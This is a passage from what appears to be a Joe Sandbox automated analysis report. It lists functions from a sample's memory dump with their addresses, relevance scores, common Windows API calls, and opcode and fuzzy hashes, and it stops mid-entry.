                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: .
                                                                  • API String ID: 0-248832578
                                                                  • Opcode ID: 278064454f00f9bb8f5ddf062015491d117cfa79fcdbf856f86ee17fee41a048
                                                                  • Instruction ID: 71ab39832d246c22a81275e0399769f6163740d659197711441b93e9b85dc5e7
                                                                  • Opcode Fuzzy Hash: 278064454f00f9bb8f5ddf062015491d117cfa79fcdbf856f86ee17fee41a048
                                                                  • Instruction Fuzzy Hash: D83126718002496FCB248E79CC84EFB7BBDDB81314F0481AEE81CD3252E7389E458B94
                                                                  Function 0047D440 Relevance: 3.5, APIs: 2, Instructions: 464COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
                                                                  • Instruction ID: 11965a0ec199381cb4b548be452a5d5e9108eb2a76103b208e160d334ead11cd
                                                                  • Opcode Fuzzy Hash: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
                                                                  • Instruction Fuzzy Hash: 95022D71E102199BDF18DFA9C9806EEB7F1EF88314F25816AD819E7384D734AD41CB94
                                                                  Function 0046AF0F Relevance: 3.0, APIs: 2, Instructions: 45COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0046AF35
                                                                  • GetNumberFormatW.KERNEL32(00000400,00000000,?,0048E72C,?,?), ref: 0046AF84
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: FormatInfoLocaleNumber
                                                                  • String ID:
                                                                  • API String ID: 2169056816-0
                                                                  • Opcode ID: 942e517c0b31f46673363704ffe6981be12e9458fe6ea42aa2287097f71fa7e1
                                                                  • Instruction ID: c0139b842199d2d135bbeb399d7dc8b209e8bce439185763a8dfa1732f9de981
                                                                  • Opcode Fuzzy Hash: 942e517c0b31f46673363704ffe6981be12e9458fe6ea42aa2287097f71fa7e1
                                                                  • Instruction Fuzzy Hash: AA015E3A110308BAD7109FA5DC45F9F77B8EF19710F408436FA05A7150E37499188BA9
                                                                  Function 00456C74 Relevance: 3.0, APIs: 2, Instructions: 16windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetLastError.KERNEL32(00456DDF,00000000,00000400), ref: 00456C74
                                                                  • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00456C95
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorFormatLastMessage
                                                                  • String ID:
                                                                  • API String ID: 3479602957-0
                                                                  • Opcode ID: 5d1827de4624b9fb8ef0b82526024863ccc173882704eeddbfe2f9a1a35ba8d9
                                                                  • Instruction ID: 0137f672959e248dfe6d39d1b9933753d3d0d65db4d26a780347333ad056da6e
                                                                  • Opcode Fuzzy Hash: 5d1827de4624b9fb8ef0b82526024863ccc173882704eeddbfe2f9a1a35ba8d9
                                                                  • Instruction Fuzzy Hash: D3D05E30244300BBEA111F218C06F1A2B98AB41B42F14C4187641950E1C6748414A71D
                                                                  Function 004819F4 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,004819EF,?,?,00000008,?,?,0048168F,00000000), ref: 00481C21
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: ExceptionRaise
                                                                  • String ID:
                                                                  • API String ID: 3997070919-0
                                                                  • Opcode ID: 1ce3f7c843e2891642b35bdd34512f619fc1077f721c53269e7073f711273a41
                                                                  • Instruction ID: 5a892f4f15961b0e84d5de10fa5d90a2ec39bf38c8503333e8f55aa794aaa5a3
                                                                  • Opcode Fuzzy Hash: 1ce3f7c843e2891642b35bdd34512f619fc1077f721c53269e7073f711273a41
                                                                  • Instruction Fuzzy Hash: B7B150315106089FD715DF28C486B697BE4FF45364F258A5AE89ACF3B1C339E982CB44
                                                                  Function 0046F654 Relevance: 1.6, APIs: 1, Instructions: 147COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0046F66A
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: FeaturePresentProcessor
                                                                  • String ID:
                                                                  • API String ID: 2325560087-0
                                                                  • Opcode ID: 18a9e7cc1a45633a1217cd930752706a4c352560460fb20df61893726fc46586
                                                                  • Instruction ID: 19e0dc9f3ca3cc817240e0c6b078bcaf476dc4b2abab16fc6ac6937c579e590c
                                                                  • Opcode Fuzzy Hash: 18a9e7cc1a45633a1217cd930752706a4c352560460fb20df61893726fc46586
                                                                  • Instruction Fuzzy Hash: B551A271A006058FEB14CF95E8917AEB7F4FB48304F24897AD441EB360E379A944CB99
                                                                  Function 0045B146 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetVersionExW.KERNEL32(?), ref: 0045B16B
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: Version
                                                                  • String ID:
                                                                  • API String ID: 1889659487-0
                                                                  • Opcode ID: 80216c0cd755f2c51a407c204f7b18fd9492db52c2bc3cac041ef81626d6ebcd
                                                                  • Instruction ID: 6a242caac470bb53ce975700619b56c377ba30736d067e43f12369d9b8d2edc1
                                                                  • Opcode Fuzzy Hash: 80216c0cd755f2c51a407c204f7b18fd9492db52c2bc3cac041ef81626d6ebcd
                                                                  • Instruction Fuzzy Hash: D3F090B4D006188FCB18CB18EC966D933F5F759345F2006BBD915933A0C374A9848FA8
                                                                  Function 004540FE Relevance: 1.5, Strings: 1, Instructions: 276COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: gj
                                                                  • API String ID: 0-4203073231
                                                                  • Opcode ID: 080259e3f6936e4343b4aa569fe48de4f961756ff63e89f22ccb473537f740fd
                                                                  • Instruction ID: 7a9e4e3324aeb22375f24fbfe842ca420efb7e6ce87859831d12e57f509ae929
                                                                  • Opcode Fuzzy Hash: 080259e3f6936e4343b4aa569fe48de4f961756ff63e89f22ccb473537f740fd
                                                                  • Instruction Fuzzy Hash: 63C14772A183418FC354CF29D88065AFBE1BFC8708F19892DE998D7311D734E955CB96
                                                                  Function 0046F9D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SetUnhandledExceptionFilter.KERNEL32(Function_0001F9F0,0046F3A5), ref: 0046F9DA
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: ExceptionFilterUnhandled
                                                                  • String ID:
                                                                  • API String ID: 3192549508-0
                                                                  • Opcode ID: e1739472d23669066fcdbfe590ba8b366727cc7fb4b5d23f58e1a0a5e6bbdb05
                                                                  • Instruction ID: 7ce29bb6cd1bcd28119a055e7990b40b2e9269a21f94cbf8c1560475664007a5
                                                                  • Opcode Fuzzy Hash: e1739472d23669066fcdbfe590ba8b366727cc7fb4b5d23f58e1a0a5e6bbdb05
                                                                  • Instruction Fuzzy Hash:
                                                                  Function 0047C030 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: HeapProcess
                                                                  • String ID:
                                                                  • API String ID: 54951025-0
                                                                  • Opcode ID: b10f8083f07808ef0bec29b1acbe14cbbd16b446a92f0b912ab2297e7ff9a3b7
                                                                  • Instruction ID: 5730316b9d4a3a2e2152e208f2cc4ea10a961fa6c8bc88e485efa4a772b34103
                                                                  • Opcode Fuzzy Hash: b10f8083f07808ef0bec29b1acbe14cbbd16b446a92f0b912ab2297e7ff9a3b7
                                                                  • Instruction Fuzzy Hash: 3DA02230202200CFC380CF30EF0C30C3BE8AA00EC2308083EA808C0030EB3080A0AB08
                                                                  Function 004662CA Relevance: .8, Instructions: 829COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5f8113f2fe17e1fe5adf28291dd6dc1f64d00099287cbfcd1ac5a0770544dab2
                                                                  • Instruction ID: 878f4adac3c736777d64f115faf34a4e4f767d80ab5237e6f5c0b0ac7c8d2166
                                                                  • Opcode Fuzzy Hash: 5f8113f2fe17e1fe5adf28291dd6dc1f64d00099287cbfcd1ac5a0770544dab2
                                                                  • Instruction Fuzzy Hash: D562F9716047849FCB15CF38C5906BABBE1AF95304F05896EDCDA8B342E738E945CB1A
                                                                  Function 004677EF Relevance: .8, Instructions: 817COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: bb9617cfb9dcd5ed73515ceaa1cdae9c81077d575e7d9551ef57e855e6e5c47f
                                                                  • Instruction ID: ef24cb5b11722cd8d2e5d6baa81e13ac338ba058eb1882de21f9a05b7879bf7c
                                                                  • Opcode Fuzzy Hash: bb9617cfb9dcd5ed73515ceaa1cdae9c81077d575e7d9551ef57e855e6e5c47f
                                                                  • Instruction Fuzzy Hash: 0962EA7160C3458FCB15DF28C5805B9BBE1BFD5308F18896EE89A8B346E734E945CB1A
                                                                  Function 0045F461 Relevance: .7, Instructions: 694COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 07bf4a65aa449dff48fd2b0c9f6b18a690921bffffe8b35fa307a18f9ecacfdb
                                                                  • Instruction ID: 17df2b3f45904c048cf20e3f17b7edf7c3a84e11181653f784f83913b3759e05
                                                                  • Opcode Fuzzy Hash: 07bf4a65aa449dff48fd2b0c9f6b18a690921bffffe8b35fa307a18f9ecacfdb
                                                                  • Instruction Fuzzy Hash: F3523B72A187018FC718CF19C891A6AF7E1FFCC304F498A2DE5959B255D334EA19CB86
                                                                  Function 00467153 Relevance: .5, Instructions: 536COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a9ca263bfd1244844cf1e36fe2c5035d8efc453b4bcc9383f6a4e0d64178196a
                                                                  • Instruction ID: 7ff9d4412c51f6d95b35fe661ed8653d9ea6bd792b06a793d4c883d6687d91b3
                                                                  • Opcode Fuzzy Hash: a9ca263bfd1244844cf1e36fe2c5035d8efc453b4bcc9383f6a4e0d64178196a
                                                                  • Instruction Fuzzy Hash: 6612D2B06187069FC718CF28C5906B9B7E0FB95308F10492EE996C7781E738A995CB4A
                                                                  Function 0045C426 Relevance: .5, Instructions: 454COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 8c862dd155657611f0b93c12b516a5156ec9095ba1ef1e4fbe8863d208981399
                                                                  • Instruction ID: dee50be7ce31f47f504acc1e4e0e21a3049615ad8567136bd78dbc914f893569
                                                                  • Opcode Fuzzy Hash: 8c862dd155657611f0b93c12b516a5156ec9095ba1ef1e4fbe8863d208981399
                                                                  • Instruction Fuzzy Hash: 44F1AD716083019FC714CF29C5C462ABBE1EF8A319F154A2FF8C597352D638D949CB8A
                                                                  Function 00466CDC Relevance: .3, Instructions: 343COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: H_prolog
                                                                  • String ID:
                                                                  • API String ID: 3519838083-0
                                                                  • Opcode ID: 3f5c5ddf7221a6e59e67f32992bfd1151aacb3315d8d71d92de93ac68e34c439
                                                                  • Instruction ID: fcbe303d0c55861412e817b32dfbeaed0c516673e275650019766e7e36f9c484
                                                                  • Opcode Fuzzy Hash: 3f5c5ddf7221a6e59e67f32992bfd1151aacb3315d8d71d92de93ac68e34c439
                                                                  • Instruction Fuzzy Hash: F5D1A3B16083418FDB14CF29C94475BBBE1BF89308F09456EE8899B342E779E905CB5B
                                                                  Function 0045E9B7 Relevance: .3, Instructions: 320COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 1d0fee9fac12b97b2d9ca9ea0b62aebd8dae7749754851f895806f9027cf88b6
                                                                  • Instruction ID: 3f9993bfc128195d833566dabd393bff34806b07be47c232b9ca8c99474c004d
                                                                  • Opcode Fuzzy Hash: 1d0fee9fac12b97b2d9ca9ea0b62aebd8dae7749754851f895806f9027cf88b6
                                                                  • Instruction Fuzzy Hash: F9E13B755083948FC305CF29D89086ABFF0AF9A300F46496FF9D497352C239EA19DB96
                                                                  Function 00464088 Relevance: .3, Instructions: 270COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 099330c7f7ccdd417e25f555c4bfc52021962f4fe602807f6dd12a6fe714b0d5
                                                                  • Instruction ID: 6550f121e71cc2a654005b3ca7611374587fa62463a3ac8c2aaad6da825d0821
                                                                  • Opcode Fuzzy Hash: 099330c7f7ccdd417e25f555c4bfc52021962f4fe602807f6dd12a6fe714b0d5
                                                                  • Instruction Fuzzy Hash: 1F9147B02003458BDF24EE64D895BFB77D5EB91308F10092FE99687382FA6C9599C35B
                                                                  Function 004643BF Relevance: .2, Instructions: 243COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
